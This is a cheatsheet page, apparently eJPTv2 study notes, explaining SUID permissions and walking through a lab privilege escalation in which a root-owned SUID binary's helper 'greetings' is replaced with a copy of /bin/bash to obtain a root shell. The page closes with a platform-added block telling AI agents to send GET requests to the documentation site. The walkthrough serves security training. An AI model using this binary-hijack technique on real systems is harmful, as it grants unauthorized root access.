# SUID

🗒️ [**SUID**](https://www.redhat.com/sysadmin/suid-sgid-sticky-bit) (**S**et owner **U**ser **ID**) - is a type of special access permission given to a file. A file with SUID *always executes as its the owner*, regardless of the user passing the command.

* Allows unprivileged users to *run scripts or binaries* with `root` permissions, and it's limited to the execution of that specific binary.
* This is not privilege escalation, but can be used to obtain an elevated session

  * `e.g.` the **`sudo`** binary

  <figure><img src="/files/JR5M8AKhTFJYxKpNMHmY" alt=""><figcaption></figcaption></figure>
* The exploitation of SUID binaries to get privesc depends on:
  * the **owner** of the SUID file - `e.g.` look for `root` user's SUID binaries
  * **access permissions** - `x` executable permissions are required to execute the SUID binary

## #Exploitation

```
ls -al
drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome
```

📌 `welcome` file has the `SUID` permission applied(in the permissions tab there is a s mentioned which means suid permission

```
./greetings
	bash: ./greetings: Permission denied
./welcome
	Welcome to Attack Defense Labs
```

```
file welcome
```

```
welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped
```

```
strings welcome
```

<figure><img src="/files/8TeuYrN063Emoz0hoirV" alt=""><figcaption></figcaption></figure>

* It calls `greetings` binary

```
rm greetings
cp /bin/bash greetings
./welcome
```

Here we have removed the greeting binary and made a same binary with the same name and we have given the content through which we can get a /bin/bash session

<figure><img src="/files/SQ6U7qe6KuMu5j9AApD1" alt="" width="289"><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/post-exploitation/privilege-escalation/linux-privilege-escalation/suid.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.